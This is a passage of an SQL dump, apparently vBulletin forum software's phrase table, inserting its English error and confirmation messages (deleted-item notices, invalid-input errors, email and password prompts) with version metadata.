'', 0, ''), (34307, -1, 'cookieclear', 'error', 'All cookies cleared!\r\n', 'vbulletin', '', 0, ''), (34308, -1, 'could_not_find', 'error', 'Could not find {1} with {2} = {3}.', 'vbulletin', '', 0, ''), (34309, -1, 'could_not_find_user_x', 'error', 'Could not find user \'{1}\'', 'vbulletin', '', 0, ''), (34310, -1, 'dbalter_enum_field_not_enum', 'error', 'The field \'{1}\' specified is not of type enum.', 'vbulletin', 'vBulletin Solutions', 1178881639, '3.6.6'), (34311, -1, 'dbalter_enum_value_already_exists', 'error', 'The value \'{1}\' already exists within the enum field definition.', 'vbulletin', 'vBulletin Solutions', 1178881723, '3.6.6'), (34312, -1, 'dbalter_enum_value_does_not_exist', 'error', 'Could not find the enum value in the definition of the field: {1}', 'vbulletin', 'vBulletin Solutions', 1178881698, '3.6.6'), (34313, -1, 'dbalter_field_already_exists', 'error', 'Field Already Exists: {1}', 'vbulletin', '', 0, ''), (34314, -1, 'dbalter_field_does_not_exist', 'error', 'Field Does Not Exist: {1}', 'vbulletin', '', 0, ''), (34315, -1, 'dbalter_mysql', 'error', 'Mysql Error: {1}', 'vbulletin', '', 0, ''), (34316, -1, 'deleted_access_masks_successfully', 'error', 'Deleted Access Masks Successfully', 'vbulletin', '', 0, ''), (34317, -1, 'deleted_announcement_successfully', 'error', 'Deleted Announcement Successfully', 'vbulletin', '', 0, ''), (34318, -1, 'deleted_answer_successfully', 'error', 'Deleted Answer Successfully', 'vbulletin', 'vBulletin Solutions', 1192563428, '3.7.0 Beta 1'), (34319, -1, 'deleted_attachment_permissions_successfully', 'error', 'Deleted Attachment Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1148072842, '3.6.0 Beta 1'), (34320, -1, 'deleted_attachment_successfully', 'error', 'Deleted Attachment Successfully', 'vbulletin', '', 0, ''), (34321, -1, 'deleted_attachment_type_successfully', 'error', 'Deleted Attachment Type Successfully', 'vbulletin', '', 0, ''), (34322, -1, 'deleted_attachments_successfully', 'error', 'Deleted Attachments Successfully', 'vbulletin', '', 0, ''), (34323, -1, 'deleted_automatic_ban_successfully', 'error', 'Deleted Automatic Ban Successfully', 'vbulletin', 'vBulletin Solutions', 1157413262, '3.6.1'), (34324, -1, 'deleted_avatar_successfully', 'error', 'Deleted Avatar Successfully', 'vbulletin', '', 0, ''), (34325, -1, 'deleted_calendar_permissions_successfully', 'error', 'Deleted Calendar Permissions Successfully', 'vbulletin', '', 0, ''), (34326, -1, 'deleted_calendar_successfully', 'error', 'Deleted Calendar Successfully', 'vbulletin', '', 0, ''), (34327, -1, 'deleted_category_successfully', 'error', 'Deleted Category Successfully', 'vbulletin', '', 0, ''), (34328, -1, 'deleted_custom_field_successfully', 'error', 'Deleted Custom Field Successfully', 'vbulletin', '', 0, ''), (34329, -1, 'deleted_duplicate_threads_successfully', 'error', 'Deleted Duplicate Threads Successfully.

It is recommended that you Rebuild Forum Information now.', 'vbulletin', '', 0, ''), (34330, -1, 'deleted_faq_item_successfully', 'error', 'Deleted FAQ Item Successfully', 'vbulletin', '', 0, ''), (34331, -1, 'deleted_file_successfully', 'error', 'Deleted File Successfully', 'vbulletin', '', 0, ''), (34332, -1, 'deleted_forum_permissions_successfully', 'error', 'Deleted Forum Permissions Successfully', 'vbulletin', '', 0, ''), (34333, -1, 'deleted_forum_successfully', 'error', 'Deleted Forum Successfully', 'vbulletin', '', 0, ''), (34334, -1, 'deleted_holiday_successfully', 'error', 'Deleted Holiday Successfully', 'vbulletin', '', 0, ''), (34335, -1, 'deleted_infraction_group_successfully', 'error', 'Deleted Infraction Group Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34336, -1, 'deleted_infraction_level_successfully', 'error', 'Deleted Infraction Level Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34337, -1, 'deleted_infraction_successfully', 'error', 'Deleted Infraction Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34338, -1, 'deleted_language_successfully', 'error', 'Deleted Language Successfully', 'vbulletin', '', 0, ''), (34339, -1, 'deleted_moderator_successfully', 'error', 'Deleted Moderator Successfully', 'vbulletin', '', 0, ''), (34340, -1, 'deleted_moderators_successfully', 'error', 'Deleted Moderators Successfully', 'vbulletin', '', 0, ''), (34341, -1, 'deleted_notice_successfully', 'error', 'Deleted Notice Successfully', 'vbulletin', 'vBulletin Solutions', 1189782393, '3.6.8'), (34342, -1, 'deleted_option_successfully', 'error', 'Deleted Option Successfully', 'vbulletin', '', 0, ''), (34343, -1, 'deleted_orphan_posts_successfully', 'error', 'Deleted Orphan Posts Successfully.', 'vbulletin', '', 0, ''), (34344, -1, 'deleted_orphan_threads_successfully', 'error', 'Deleted Orphan Threads Successfully.

It is recommended that you Rebuild Forum Information now.', 'vbulletin', '', 0, ''), (34345, -1, 'deleted_paymentapi_successfully', 'error', 'Deleted Payment API Successfully', 'vbulletin', '', 0, ''), (34346, -1, 'deleted_phrase_successfully', 'error', 'Deleted Phrase Successfully', 'vbulletin', '', 0, ''), (34347, -1, 'deleted_plugin_successfully', 'error', 'Deleted Plugin Successfully', 'vbulletin', '', 0, ''), (34348, -1, 'deleted_poll_successfully', 'error', 'Deleted Poll Successfully', 'vbulletin', '', 0, ''), (34349, -1, 'deleted_post_icon_successfully', 'error', 'Deleted Post Icon Successfully', 'vbulletin', '', 0, ''), (34350, -1, 'deleted_private_messages_successfully', 'error', 'Deleted Private Messages Successfully', 'vbulletin', '', 0, ''), (34351, -1, 'deleted_profile_field_category_successfully', 'error', 'Deleted user profile field category successfully', 'vbulletin', 'vBulletin Solutions', 1176908676, '3.6.6'), (34352, -1, 'deleted_promotion_successfully', 'error', 'Deleted Promotion Successfully', 'vbulletin', '', 0, ''), (34353, -1, 'deleted_question_successfully', 'error', 'Deleted Question Successfully', 'vbulletin', 'vBulletin Solutions', 1192564130, '3.7.0 Beta 1'), (34354, -1, 'deleted_reputation_level_successfully', 'error', 'Deleted Reputation Level Successfully', 'vbulletin', '', 0, ''), (34355, -1, 'deleted_reputation_successfully', 'error', 'Deleted Reputation Successfully', 'vbulletin', '', 0, ''), (34356, -1, 'deleted_rssfeed_x_successfully', 'error', 'Deleted RSS Feed \'{1}\' Successfully', 'vbulletin', 'vBulletin Solutions', 1149590407, '3.6.0 Beta 1'), (34357, -1, 'deleted_scheduled_task_successfully', 'error', 'Deleted Scheduled Task Successfully', 'vbulletin', '', 0, ''), (34358, -1, 'deleted_setting_group_successfully', 'error', 'Deleted Setting Group Successfully', 'vbulletin', '', 0, ''), (34359, -1, 'deleted_setting_successfully', 'error', 'Deleted Setting Successfully', 'vbulletin', '', 0, ''), (34360, -1, 'deleted_smilie_successfully', 'error', 'Deleted Smilie Successfully', 'vbulletin', '', 0, ''), (34361, -1, 'deleted_subscription_permissions_successfully', 'error', 'Deleted Subscription Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1146676227, '3.6.0 Beta 1'), (34362, -1, 'deleted_subscription_successfully', 'error', 'Deleted Subscription Successfully', 'vbulletin', '', 0, ''), (34363, -1, 'deleted_subscriptions_successfully', 'error', 'Deleted Subscriptions Successfully', 'vbulletin', '', 0, ''), (34364, -1, 'deleted_topic_successfully', 'error', 'Deleted Topic Successfully', 'vbulletin', '', 0, ''), (34365, -1, 'deleted_user_profile_field_successfully', 'error', 'Deleted User Profile Field Successfully', 'vbulletin', '', 0, ''), (34366, -1, 'deleted_user_rank_successfully', 'error', 'Deleted User Rank Successfully', 'vbulletin', '', 0, ''), (34367, -1, 'deleted_user_successfully', 'error', 'Deleted User Successfully', 'vbulletin', '', 0, ''), (34368, -1, 'deleted_user_title_successfully', 'error', 'Deleted User Title Successfully', 'vbulletin', '', 0, ''), (34369, -1, 'deleted_usergroup_leader_successfully', 'error', 'Deleted Usergroup Leader Successfully', 'vbulletin', '', 0, ''), (34370, -1, 'deleted_usergroup_successfully', 'error', 'Deleted Usergroup Successfully', 'vbulletin', '', 0, ''), (34371, -1, 'deleted_visitor_messages_successfully', 'error', 'Deleted Visitor Messages Successfully', 'vbulletin', 'vBulletin Solutions', 1222174801, '3.8.0 Alpha 2'), (34372, -1, 'deleted_x_pms_y_pmtexts_and_z_receipts', 'error', 'Deleted {1} private messages, {2} pmtext records and {3} receipts', 'vbulletin', '', 0, ''), (34373, -1, 'dependencies_not_met_x', 'error', 'The following dependencies were not met:\r\n{1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34374, -1, 'description_toolong_max_x', 'error', 'The description that you have entered is too long ({1} characters). Please shorten it to {2} characters long.', 'vbulletin', 'vBulletin Solutions', 1218210332, '3.8.0 Alpha 1'), (34375, -1, 'destination_forum_cant_contain_threads', 'error', 'The destination forum cannot contain threads, therefore you cannot move any threads into it', 'vbulletin', '', 0, ''), (34376, -1, 'did_not_select_any_valid_prefixes_to_copy_to', 'error', 'You did not select any valid prefixes to copy to.', 'vbulletin', 'vBulletin Solutions', 1216744422, '3.8.0 Alpha 1'), (34377, -1, 'download_contains_no_customizations', 'error', 'The item you are attempting to download contains no customizations.', 'vbulletin', '', 0, ''), (34378, -1, 'duplicate_post', 'error', 'This post is a duplicate of a post that you have posted in the last five minutes.', 'vbulletin', 'vBulletin Solutions', 1155227415, '3.6.1'), (34379, -1, 'duplicated_permissions_successfully', 'error', 'Duplicated Permissions Successfully', 'vbulletin', '', 0, ''), (34380, -1, 'duplicated_prefix_permissions', 'error', 'Duplicated Prefix Permissions', 'vbulletin', 'vBulletin Solutions', 1216744446, '3.8.0 Alpha 1'), (34381, -1, 'edittimelimit', 'error', 'The administrator has specified that you can only edit messages for {1} minutes after you have posted. This limit has expired, so you must contact the administrator to make alterations on your message.', 'vbulletin', '', 0, ''), (34382, -1, 'emailchanged', 'error', 'Thank you, your email address has been updated to {1}.', 'vbulletin', 'vBulletin Solutions', 1154126580, '3.6.0'), (34383, -1, 'emaildisabled', 'error', 'Sorry. The email function has been disabled by the administrator.', 'vbulletin', '', 0, ''), (34384, -1, 'emailfloodcheck', 'error', 'This forum requires that you wait {1} seconds between sending emails. Please try again in {2} seconds.', 'vbulletin', '', 0, ''), (34385, -1, 'emailmismatch', 'error', 'The two email addresses that you entered do not match.', 'vbulletin', '', 0, ''), (34386, -1, 'emails_sent_successfully', 'error', 'Emails Sent Successfully', 'vbulletin', '', 0, ''), (34387, -1, 'emailtaken', 'error', 'The email address you entered is already in use. If you have forgotten your password, please click here.', 'vbulletin', '', 0, ''), (34388, -1, 'emailtaken_edit_here', 'error', 'The email address you entered is already in use. You can edit that user here.', 'vbulletin', 'vBulletin Solutions', 1200913170, '3.7.0 Beta 4'), (34389, -1, 'emailtaken_search_here', 'error', 'The email address you entered is already in use. You may search for any users using this email address here.', 'vbulletin', 'vBulletin Solutions', 1200913551, '3.7.0 Beta 4'), (34390, -1, 'emptied_search_index_successfully', 'error', 'Emptied Search Index Successfully', 'vbulletin', '', 0, ''), (34391, -1, 'enabled_disabled_scheduled_task_successfully', 'error', 'Enabled / Disabled Scheduled Task Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34392, -1, 'enter_cost_information_for_subscription_x', 'error', 'Enter the cost information for subscription: {1}', 'vbulletin', 'vBulletin Solutions', 1164210348, '3.6.4'), (34393, -1, 'enter_subscription_length_for_subscription_x', 'error', 'Enter the subscription length for subscription: {1}', 'vbulletin', 'vBulletin Solutions', 1164210359, '3.6.4'), (34394, -1, 'error_in_template_x_y', 'error', 'The following error occurred when attempting to evaluate the template \'{1}\':
{2}
This is likely caused by a malformed conditional statement.', 'vbulletin', '', 0, ''), (34395, -1, 'error_writing_x', 'error', 'Error Writing {1}. You Can See More Information Above', 'vbulletin', '', 0, ''), (34396, -1, 'event_already_complete', 'error', 'This event has already been marked as complete by {1}, {2} at {3}', 'vbulletin', '', 0, ''), (34397, -1, 'eventsnoselected', 'error', 'You did not specify any event reminders to modify.', 'vbulletin', '', 0, ''), (34398, -1, 'expression_contains_backticks_x_please_rewrite_without', 'error', 'The following template conditional expression contains back-ticks (`):
\r\n
\r\n{1}
\r\n
\r\nThe use of back-ticks is forbidden. Please go back and re-write the conditional expression without using them.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'), (34399, -1, 'fieldmissing', 'error', 'You have left a required field blank.', 'vbulletin', '', 0, ''), (34400, -1, 'fieldmissing_email', 'error', 'Please complete the required field \"Email\".', 'vbulletin', '', 0, ''), (34401, -1, 'fieldmissing_parentemail', 'error', 'Please complete the required field \"Parent Email\".', 'vbulletin', '', 0, ''), (34402, -1, 'fieldmissing_username', 'error', 'Please complete the required field \"Username\".', 'vbulletin', '', 0, ''), (34403, -1, 'file_x_already_exists', 'error', 'The file {1} already exists.', 'vbulletin', '', 0, ''), (34404, -1, 'forum_cant_have_password', 'error', 'The administrator has specified that this forum may not be password-protected', 'vbulletin', '', 0, ''), (34405, -1, 'forum_is_a_category_allow_posting', 'error', 'You have selected a forum that is a category. Please select a forum that allows posting.', 'vbulletin', 'vBulletin Solutions', 1152530479, '3.6.0 Release Candidate 1'), (34406, -1, 'forumclosed', 'error', 'Sorry! This forum is not accepting new posts.', 'vbulletin', '', 0, ''), (34407, -1, 'forumpasswordincorrect', 'error', '

The password you entered was incorrect. Please try again.
\r\nNote: This requires cookies to be enabled!

\r\n\r\n
\r\n\r\n\r\n\r\n\r\n{4}\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
Password:
\r\n\r\n
', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34408, -1, 'forumpasswordmissing', 'error', '

Your administrator has required a password to access this forum. Please enter this password now.
\r\nNote: This requires cookies!

\r\n\r\n
\r\n\r\n\r\n\r\n\r\n\r\n{4}\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
Password:
\r\n\r\n
', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34409, -1, 'forumpasswordmissing_ajax', 'error', 'Your administrator has required a password to access this forum. Please refresh this page and enter the password when asked.', 'vbulletin', 'vBulletin Solutions', 1204133092, '3.7.0 Beta 6'), (34410, -1, 'friendswithself', 'error', 'You can\'t be friends with yourself.', 'vbulletin', 'vBulletin Solutions', 1195235503, '3.7.0 Beta 1'), (34411, -1, 'generic_error_x', 'error', '{1}', 'vbulletin', '', 0, ''), (34412, -1, 'group_already_exists_view_x', 'error', 'A group with that name already exists. You can view it here.', 'vbulletin', 'vBulletin Solutions', 1195660385, '3.7.0 Beta 1'), (34413, -1, 'group_ownership_request_rejected', 'error', 'Group ownership change request rejected', 'vbulletin', 'vBulletin Solutions', 1232709826, '3.8.1'), (34414, -1, 'guest_posts_may_not_contain_attachments', 'error', 'Guest posts may not contain attachments. Please select a registered user name to own this merged post.', 'vbulletin', '', 0, ''), (34415, -1, 'humanverify_image_wronganswer', 'error', 'The string you entered for the image verification did not match what was displayed.', 'vbulletin', 'vBulletin Solutions', 1192648116, '3.7.0 Beta 1'), (34416, -1, 'humanverify_question_wronganswer', 'error', 'The answer given for the random question was incorrect.', 'vbulletin', 'vBulletin Solutions', 1192574503, '3.7.0 Beta 1'), (34417, -1, 'humanverify_recaptcha_challenge', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ challenge setting. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205929932, '3.7.0 Release Candidate 1'), (34418, -1, 'humanverify_recaptcha_parameters', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ parameters. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205930038, '3.7.0 Release Candidate 1'), (34419, -1, 'humanverify_recaptcha_privatekey', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ private key. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205930045, '3.7.0 Release Candidate 1'), (34420, -1, 'humanverify_recaptcha_publickey', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ public key. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205930053, '3.7.0 Release Candidate 1'), (34421, -1, 'humanverify_recaptcha_referrer', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ domain setting. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205930058, '3.7.0 Release Candidate 1'), (34422, -1, 'humanverify_recaptcha_unreachable', 'error', 'Image verification could not be verified due to server issues. Please try again later.', 'vbulletin', 'vBulletin Solutions', 1192648471, '3.7.0 Beta 1'), (34423, -1, 'image_resize_failed_x', 'error', 'Image resize failed:
{1}
', 'vbulletin', 'vBulletin Solutions', 1145307709, '3.6.0 Beta 1'), (34424, -1, 'images_moved_to_the_database', 'error', 'Images Successfully Moved to the Database', 'vbulletin', '', 0, ''), (34425, -1, 'images_moved_to_the_filesystem', 'error', 'Images Successfully Moved to the Filesystem', 'vbulletin', '', 0, ''), (34426, -1, 'immethodnotdefined', 'error', '{1} has not specified contact details for this medium.', 'vbulletin', '', 0, ''), (34427, -1, 'infraction_already_reversed', 'error', 'This infraction has already been reversed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34428, -1, 'infractionupdated', 'error', 'This infraction has been updated since you viewed. Please go back and refresh the infraction to see the changes.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34429, -1, 'install_ghostscript_to_resize_pdf', 'error', 'Ghostscript must be installed on the server to resize .pdf files.', 'vbulletin', 'vBulletin Solutions', 1212055446, '3.7.2'), (34430, -1, 'invalid_action', 'error', 'Invalid Action Specified', 'vbulletin', '', 0, ''), (34431, -1, 'invalid_action_specified', 'error', 'Invalid Action Specified', 'vbulletin', '', 0, ''), (34432, -1, 'invalid_array_specified', 'error', 'Invalid Array Specified', 'vbulletin', '', 0, ''), (34433, -1, 'invalid_attachments_specified', 'error', 'Invalid Attachments Specified', 'vbulletin', '', 0, ''), (34434, -1, 'invalid_avatar_specified', 'error', 'Invalid Avatar Specified', 'vbulletin', '', 0, ''), (34435, -1, 'invalid_ban_period_specified', 'error', 'Invalid Ban Period Specified', 'vbulletin', '', 0, ''), (34436, -1, 'invalid_banreason', 'error', 'Since this infraction will result in the user being banned you must give a ban reason, which the user will see on the no permission screen.', 'vbulletin', 'vBulletin Solutions', 1157584172, '3.6.1'), (34437, -1, 'invalid_calendar_specified', 'error', 'Invalid Calendar Specified', 'vbulletin', '', 0, ''), (34438, -1, 'invalid_currency', 'error', 'An invalid currency was selected.', 'vbulletin', '', 0, ''), (34439, -1, 'invalid_custom_field_specified', 'error', 'Invalid Custom Field Specified', 'vbulletin', '', 0, ''), (34440, -1, 'invalid_custom_infraction_description', 'error', 'Enter a description for this custom infraction', 'vbulletin', 'vBulletin Solutions', 1149886072, '3.6.0 Beta 2'), (34441, -1, 'invalid_date_range_specified', 'error', 'Invalid Date Range Specified', 'vbulletin', '', 0, ''), (34442, -1, 'invalid_destination_forum_specified', 'error', 'Invalid Destination Forum Specified', 'vbulletin', '', 0, ''), (34443, -1, 'invalid_destination_username_specified', 'error', 'Invalid Destination Username Specified', 'vbulletin', '', 0, ''), (34444, -1, 'invalid_directory_specified', 'error', 'Invalid Directory Specified', 'vbulletin', '', 0, ''), (34445, -1, 'invalid_email_specified', 'error', 'Invalid Email Specified', 'vbulletin', '', 0, ''), (34446, -1, 'invalid_extension_specified', 'error', 'Invalid Extension Specified', 'vbulletin', 'vBulletin Solutions', 1148488646, '3.6.0 Beta 1'), (34447, -1, 'invalid_faq_item_specified', 'error', 'Invalid FAQ Item Specified', 'vbulletin', '', 0, ''), (34448, -1, 'invalid_faq_varname', 'error', 'The varname you specified for this FAQ is invalid. You may only include a-z, A-Z, 0-9, and _ (underscore).', 'vbulletin', '', 0, ''), (34449, -1, 'invalid_file_path_specified', 'error', 'Invalid File Path Specified', 'vbulletin', '', 0, ''), (34450, -1, 'invalid_file_specified', 'error', 'Invalid File Specified', 'vbulletin', '', 0, ''), (34451, -1, 'invalid_filename_specified', 'error', 'Invalid Filename Specified', 'vbulletin', '', 0, ''), (34452, -1, 'invalid_forum_permissions_specified', 'error', 'Invalid Forum Permissions Specified', 'vbulletin', '', 0, ''), (34453, -1, 'invalid_forum_specified', 'error', 'Invalid Forum Specified', 'vbulletin', '', 0, ''), (34454, -1, 'invalid_imageprefix_specified', 'error', 'The image prefix specified is not valid.', 'vbulletin', 'vBulletin Solutions', 1194284266, '3.7.0 Beta 1'), (34455, -1, 'invalid_infraction_usergroup', 'error', 'You cannot have the same pointlevel defined more than once for the same usergroup. \"All Usergroups\" entries must have a unique point level from all other entries.', 'vbulletin', 'vBulletin Solutions', 1150741401, '3.6.0 Beta 3'), (34456, -1, 'invalid_language_specified', 'error', 'Invalid Language Specified', 'vbulletin', '', 0, ''), (34457, -1, 'invalid_locale', 'error', 'The locale \'{1}\' could not be located on this server.', 'vbulletin', '', 0, ''), (34458, -1, 'invalid_moderator_specified', 'error', 'Invalid Moderator Specified', 'vbulletin', '', 0, ''), (34459, -1, 'invalid_option_specified', 'error', 'Invalid Option Specified', 'vbulletin', '', 0, ''), (34460, -1, 'invalid_page_specified', 'error', 'Invalid Page Specified', 'vbulletin', '', 0, ''), (34461, -1, 'invalid_password_specified', 'error', 'Invalid Password Specified', 'vbulletin', '', 0, ''), (34462, -1, 'invalid_phrase_specified', 'error', 'Invalid Phrase Specified', 'vbulletin', '', 0, ''), (34463, -1, 'invalid_phrase_varname', 'error', 'The varname you specified for this phrase is invalid. You may only include a-z, A-Z, 0-9, and _ (underscore).', 'vbulletin', '', 0, ''), (34464, -1, 'invalid_podcasturl', 'error', 'Podcast - Could not determine filesize. Verify that the URL is correct and if it is, enter the filesize manually.', 'vbulletin', 'vBulletin Solutions', 1152645073, '3.6.0 Release Candidate 2'), (34465, -1, 'invalid_poll_specified', 'error', 'Invalid Poll Specified', 'vbulletin', '', 0, ''), (34466, -1, 'invalid_product_specified', 'error', 'Invalid Product Specified', 'vbulletin', '', 0, ''), (34467, -1, 'invalid_product_version', 'error', 'Invalid product version specified. Product versions should be specified in the standard vBulletin version format or a similar format.', 'vbulletin', 'vBulletin Solutions', 1209726715, '3.7.1'), (34468, -1, 'invalid_quick_set_action', 'error', 'Invalid quick set action specified', 'vbulletin', '', 0, ''), (34469, -1, 'invalid_referrer_specified', 'error', 'Invalid Referrer Specified', 'vbulletin', '', 0, ''), (34470, -1, 'invalid_search_syntax', 'error', 'Search terms contain invalid syntax: -word1 OR word2 / word1 OR -word2', 'vbulletin', 'vBulletin Solutions', 1155596135, '3.6.1'), (34471, -1, 'invalid_selector_name_x', 'error', 'Invalid selector name {1}.', 'vbulletin', 'vBulletin Solutions', 1193401478, '3.7.0 Beta 1'), (34472, -1, 'invalid_social_group_category_specified', 'error', 'Invalid Social Group Category Specified', 'vbulletin', 'vBulletin Solutions', 1215703983, '3.8.0 Alpha 1'), (34473, -1, 'invalid_source_username_specified', 'error', 'Invalid Source Username Specified', 'vbulletin', '', 0, ''), (34474, -1, 'invalid_string_id_alphanumeric', 'error', 'Invalid string specified. You may only use a-z, 0-9 and _ (underscore).', 'vbulletin', 'vBulletin Solutions', 1210067261, '3.7.1'), (34475, -1, 'invalid_style_specified', 'error', 'Invalid Style Specified', 'vbulletin', '', 0, ''), (34476, -1, 'invalid_subscription_length', 'error', 'The length of the subscription you entered is invalid. The length must be a positive value which will result in a date less than 2037.', 'vbulletin', '', 0, ''), (34477, -1, 'invalid_table_specified', 'error', 'Invalid Table Specified', 'vbulletin', '', 0, ''), (34478, -1, 'invalid_tag_specified', 'error', 'Invalid Tag Specified', 'vbulletin', 'vBulletin Solutions', 1190808692, '3.7.0 Beta 1'), (34479, -1, 'invalid_timeframe', 'error', 'Invalid timeframe entered for custom infraction expiration. How many hours, days, or months?', 'vbulletin', 'vBulletin Solutions', 1149874790, '3.6.0 Beta 2'), (34480, -1, 'invalid_timezone_specified', 'error', 'Invalid Timezone Specified', 'vbulletin', '', 0, ''), (34481, -1, 'invalid_title_specified', 'error', 'Invalid Title Specified', 'vbulletin', '', 0, ''), (34482, -1, 'invalid_transfer_request', 'error', 'You cannot accept ownership of the specified social group. If you have followed a valid link, you or the existing group owner may have cancelled the request to transfer the group ownership.', 'vbulletin', 'vBulletin Solutions', 1221645706, '3.8.0 Alpha 1'), (34483, -1, 'invalid_user_specified', 'error', 'Invalid User Specified', 'vbulletin', '', 0, ''), (34484, -1, 'invalid_user_title_specified', 'error', 'Invalid User Title Specified', 'vbulletin', '', 0, ''), (34485, -1, 'invalid_usergroup_leader_specified', 'error', 'Invalid Usergroup Leader Specified', 'vbulletin', '', 0, ''), (34486, -1, 'invalid_usergroup_specified', 'error', 'Invalid Usergroup Specified', 'vbulletin', '', 0, ''), (34487, -1, 'invalid_username_specified', 'error', 'Invalid User Name Specified', 'vbulletin', '', 0, ''), (34488, -1, 'invalid_users_specified', 'error', 'Invalid Users Specified', 'vbulletin', '', 0, ''), (34489, -1, 'invalid_values_customize_profile', 'error', 'You entered one or more invalid values when trying to customize this user\'s profile.', 'vbulletin', 'vBulletin Solutions', 1199377639, '3.7.0 Beta 4'), (34490, -1, 'invalid_version_check_url_specified', 'error', 'Invalid version check URL specified', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34491, -1, 'invalid_x_specified', 'error', 'Invalid {1} Specified', 'vbulletin', '', 0, ''), (34492, -1, 'invalidactivateid', 'error', 'We could not activate your account because this web address is not valid. Make sure that you have the entire address from the email, and that your email client has not split the address over several lines.
\r\n
Please try again with the full address from the email that you received. If it still does not work, try filling in the activation form:
\r\nActivation form

\r\n\r\n

If you do not know your activation code, you can find it in the email that was sent to you when you first registered. To have it sent again, please click here:
\r\nSend new email with activation code.

\r\n\r\n

If all else fails, email the administrator, making sure that you include your registered email address and username.', 'vbulletin', '', 0, ''), (34493, -1, 'invalidemail', 'error', 'You have not entered an email address that we recognize. Please try again or contact the administrator.', 'vbulletin', '', 0, ''), (34494, -1, 'invalidid', 'error', 'Invalid {1} specified. If you followed a valid link, please notify the administrator', 'vbulletin', '', 0, ''), (34495, -1, 'invalidid_ajax', 'error', 'Invalid {1} specified. If you followed a valid link, please notify the administrator.', 'vbulletin', 'vBulletin Solutions', 1198883161, '3.7.0 Beta 4'), (34496, -1, 'invalidvote', 'error', 'You submitted an invalid vote.', 'vbulletin', '', 0, ''), (34497, -1, 'language_already_exists', 'error', 'A language called \'{1}\' already exists. - To use this language file, either overwrite the language called \'{1}\', or enter a different title on the upload form.', 'vbulletin', '', 0, ''), (34498, -1, 'language_only_phrases', 'error', 'The file you attempted to import only contains phrases and none of the settings required.\r\n\r\nYou will be unable to make a new language with this file.', 'vbulletin', '', 0, ''), (34499, -1, 'lifted_ban_on_user_x_successfully', 'error', 'Lifted Ban on User {1} Successfully', 'vbulletin', '', 0, ''), (34500, -1, 'listbaduser', 'error', 'The user \'{1}\' was not found in the database. Please go back and correct this problem. You may want to check out the member list.', 'vbulletin', '', 0, ''), (34501, -1, 'listignoreuser', 'error', 'Sorry {1} is a moderator/admin and you are not allowed to ignore him or her.', 'vbulletin', '', 0, ''), (34502, -1, 'listlimit', 'error', 'You may only have a maximum of 1000 users on this list.', 'vbulletin', 'vBulletin Solutions', 1162930914, '3.6.3'), (34503, -1, 'locale_define_fill_in_all_overrides', 'error', 'You have defined a locale for this language but did not define all of the date/time override fields. You must define each of these fields using the formatting style that is listed. Note that this style differs from the formatting you would use in the vboptions for the normal date/time fields.', 'vbulletin', '', 0, ''), (34504, -1, 'logout_error', 'error', 'An error occurred while attempting to log you out. Click here to log out.', 'vbulletin', '', 0, ''), (34505, -1, 'maxpolltimeout', 'error', 'The value entered for timeout has exceeded the maximum possible value.', 'vbulletin', '', 0, ''), (34506, -1, 'mergebadurl', 'error', 'You have not specified a valid URL for the thread that you want to merge. Please check that the URL includes a valid threadid, \"t=xxx\" or postid, \"p=xxx\" (where xxx is a number), and is not a redirect.', 'vbulletin', 'vBulletin Solutions', 1165970610, '3.6.5'), (34507, -1, 'merged_thread_can_contain_one_poll', 'error', 'Merged threads can contain a maximum of one poll.', 'vbulletin', '', 0, ''), (34508, -1, 'missing_temporary_folder', 'error', 'Missing PHP temporary folder; check upload_tmp_dir', 'vbulletin', 'vBulletin Solutions', 1190139531, '3.7.0 Beta 1'), (34509, -1, 'moderated_attachments_successfully', 'error', 'Moderated Attachments Successfully', 'vbulletin', '', 0, ''), (34510, -1, 'moderated_events_successfully', 'error', 'Moderated Events Successfully', 'vbulletin', '', 0, ''), (34511, -1, 'moderated_posts_successfully', 'error', 'Moderated Threads / Posts Successfully', 'vbulletin', '', 0, ''), (34512, -1, 'moderated_signatures_successfully', 'error', 'Moderated Signatures Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34513, -1, 'moderated_visitor_messages_successfully', 'error', 'Moderated Visitor Messages Successfully', 'vbulletin', 'vBulletin Solutions', 1197370927, '3.7.0 Beta 1'), (34514, -1, 'moderateuser', 'error', 'Thank you for registering, {1}. Your account has been submitted for moderation by an administrator and will be activated shortly. You will be notified by email when this happens. To return to the forums, click here.', 'vbulletin', '', 0, ''), (34515, -1, 'move_posts_moderated_forums_only', 'error', 'You may only move posts into threads within forums you moderate.', 'vbulletin', 'vBulletin Solutions', 1183555725, '3.6.8'), (34516, -1, 'moved_threads_successfully', 'error', 'Moved Threads Successfully.

